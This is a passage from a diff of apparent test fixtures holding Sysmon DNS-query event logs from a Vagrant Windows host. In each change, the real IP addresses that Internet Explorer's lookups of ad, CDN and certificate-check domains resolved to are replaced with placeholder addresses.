Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -2353,7 +2353,7 @@ "ProcessId": "2736", "QueryName": "image2.pubmatic.com", "QueryStatus": "0", - "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;" + "QueryResults": "type: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;" }, "process": { "thread": { @@ -2380,7 +2380,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -2400,7 +2400,7 @@ "ProcessId": "2736", "QueryName": "sam.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;", + "QueryResults": "type: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.183", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -2419,7 +2419,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2445,7 +2445,7 @@ "computer_name": "vagrant-2016", "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "event_data": { - "QueryResults": "::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.222", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2461,7 +2461,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "log": { "level": "information" @@ -2490,7 +2490,7 @@ "ProcessId": "2736", "QueryName": "c1.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;", + "QueryResults": "type: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -2504,7 +2504,7 @@ "event_data": { "QueryName": "urs.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;", + "QueryResults": "type: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.271", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -2532,7 +2532,7 @@ "event": { "provider": "Microsoft-Windows-Sysmon", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:40.84.140.84;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eurs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-southcentral-2-fe.southcentralus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event" }, "log": { @@ -2564,7 +2564,7 @@ "ProcessId": "2736", "QueryName": "dsum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.290" }, @@ -2575,7 +2575,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802560700Z'/\u003e\u003cEventRecordID\u003e116\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.290\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2584,7 +2584,7 @@ { "@timestamp": "2021-05-05T15:30:51.699Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802569800Z'/\u003e\u003cEventRecordID\u003e117\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.292\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.godaddy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -2600,7 +2600,7 @@ "ProcessId": "2736", "QueryName": "ocsp.godaddy.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:72.167.239.239;" + "QueryResults": "type: 5 ocsp.godaddy.com.akadns.net;::ffff:89.160.20.156;" }, "computer_name": "vagrant-2016", "version": 5, @@ -2759,7 +2759,7 @@ "ProcessId": "2736", "QueryName": "ocsp.usertrust.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -2780,7 +2780,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 